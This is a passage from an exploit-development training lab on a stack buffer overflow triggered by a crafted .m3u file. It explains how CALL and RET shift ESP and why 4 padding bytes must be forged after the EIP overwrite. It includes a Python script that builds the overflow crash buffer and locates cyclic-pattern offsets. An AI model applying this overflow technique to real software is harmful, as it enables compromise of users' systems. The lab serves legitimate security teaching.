Lab 4: Shellcode?
Lesson:
Hmmm…
Ok, we can see two interesting things here. The first: ESP points at the 5th character of our pattern, not at the first one.
Why?
When a function is called, the CALL instruction first pushes the return pointer (the EIP of the next instruction) onto the stack
Then it jumps to the address of the function
When the called function (in this case strcpy()) executes RET, it pops those 4 bytes off the stack into EIP, and ESP moves up by 4
See if this is true in example.exe: does CALL push EIP onto the stack, and does RET pop it?
So when we return, the first 4 bytes at ESP are popped into EIP
Can we see this in our padding example? Try it: does 1ABCDEFG go to EIP?
When we RET straight into the start of a function (by overwriting the saved return pointer with that function's address), no CALL has happened, so no return pointer has been pushed for that function
We then have to forge this return pointer ourselves, i.e. PADD (the 4 "missing" characters right after the EIP overwrite)
If we gave this forged return pointer the address of the exit() function, the program would close gracefully rather than throwing an exception
NOTE: After the pattern string we see "A"s. These A's most likely belong to the first part of the buffer (the 26064 A's), so we may also be able to put our shellcode in the first part of the buffer (before overwriting RET)…
Moving on...
We'll first add 4 characters in front of the pattern and run the test again
If all goes well, ESP should now point directly at the beginning of our pattern
Let the application crash and look at ESP again
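Added example (not the lab's own exploit script): a Python helper that generates the cyclic pattern, builds the crash buffer in both layouts (pattern right after the EIP overwrite, and with the 4 PADD bytes in front of it), and looks up which pattern offset a register value corresponds to. Assumptions not stated on the page: the script is Python 3, the 26064 bytes of junk and the 4-byte EIP overwrite come from the earlier labs, a 1000-byte pattern is used, and the fact that ESP lands 4 bytes past the EIP overwrite is the observation from the lab's debugger session, entered as a constant because a script cannot know it on its own. The file name crash_[sid].m3u is left to the student.

```python
"""Cyclic-pattern helper for the Lab 4 crash file.

Added example, not the lab's own exploit script. Assumed (not on the page):
Python 3, 26064 junk bytes reach the saved return pointer, the next 4 bytes
land in EIP, a 1000-byte pattern, and the lab's debugger observation that
ESP points 4 bytes past the EIP overwrite (entered below as a constant).
"""
import string
import struct
from itertools import product

JUNK_LEN = 26064            # A's up to the saved return pointer (from the lab)
EIP_OVERWRITE = b"BBBB"     # popped into EIP by the RET
FAKE_RET = b"CCCC"          # PADD: the 4 "missing" bytes, our forged return pointer
PATTERN_LEN = 1000          # assumed pattern length
# Observed in the lab's debugger session, not computed: after the crash, ESP
# points at file offset JUNK_LEN + 8 (4 bytes of EIP overwrite that RET
# popped, plus the 4 "missing" bytes).
ESP_FILE_OFFSET = JUNK_LEN + 4 + 4


def pattern_create(length):
    """Metasploit-style cyclic pattern (Aa0Aa1...Aa9Ab0...).

    Every 4-byte window is unique for up to 20280 bytes; beyond that the
    pattern repeats and an offset found in it is ambiguous.
    """
    out = ""
    while len(out) < length:
        for upper, lower, digit in product(string.ascii_uppercase,
                                           string.ascii_lowercase,
                                           string.digits):
            out += upper + lower + digit
            if len(out) >= length:
                break
    return out[:length]


def pattern_offset(value, length=PATTERN_LEN):
    """Offset of a 4-byte register value inside the pattern, or -1.

    Accepts the ASCII seen in the memory dump ("Aa3A") or the register as
    the debugger prints it, a little-endian hex dword ("0x41336141").
    """
    if isinstance(value, bytes):
        needle = value.decode("latin-1")
    elif value.lower().startswith("0x"):
        needle = struct.pack("<I", int(value, 16)).decode("latin-1")
    else:
        needle = value
    pat = pattern_create(length)
    idx = pat.find(needle)
    if idx == -1:                     # value may have been read big-endian
        idx = pat.find(needle[::-1])
    return idx


def build_crash_buffer(fix=True, junk_len=JUNK_LEN, eip=EIP_OVERWRITE,
                       fake_ret=FAKE_RET, pattern_len=PATTERN_LEN):
    """Crash buffer: junk | EIP | [PADD] | pattern.

    fix=False is the first attempt (pattern directly after EIP); fix=True adds
    the 4 PADD bytes so the pattern starts exactly where ESP points.
    """
    pattern = pattern_create(pattern_len).encode("ascii")
    return b"A" * junk_len + eip + (fake_ret if fix else b"") + pattern


def bytes_at_esp(buf, esp_offset=ESP_FILE_OFFSET):
    """The 4 bytes the debugger shows at [ESP] after the crash (lab observation)."""
    return buf[esp_offset:esp_offset + 4]


def write_m3u(path, buf):
    """Write the buffer as the .m3u file to transfer to the target."""
    with open(path, "wb") as fh:
        fh.write(buf)


if __name__ == "__main__":
    for fix in (False, True):
        buf = build_crash_buffer(fix=fix)
        at_esp = bytes_at_esp(buf).decode("ascii")
        print(f"fix={fix}: [ESP] = {at_esp!r}, pattern offset {pattern_offset(at_esp)}")
    # the lab names this crash_[sid].m3u; the name is up to the student
    write_m3u("crash.m3u", build_crash_buffer(fix=True))
```

Without the fix, the 4 bytes at ESP are `a1Aa`, the pattern's 5th character onwards; with the 4 PADD bytes in place, they are `Aa0A`, the start of the pattern. pattern_offset() is what to use in Step 7 if you want the offset rather than the address: paste the dword from the register window and it returns where in the pattern it sits.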
Short, but time for some hands-on testing!
Assignment:
Step 1 – Locate which register points at our "shellcode"
Step 2 – Create the pattern
Step 3 – Run the executable, transfer crash_[sid].m3u to the target, and run it in the debugger
Step 4 – Review the pattern
Look at the register previously identified
What is weird about our pattern?
Step 5 – Fix the code so that the pattern starts at the beginning
Step 6 – Run the executable, transfer crash_[sid].m3u to the target, and run it in the debugger
Step 7 – Verify that ESP now points at the full pattern
Step 8 – Write down the memory location of the beginning of this pattern
Answers:
View associated .txt file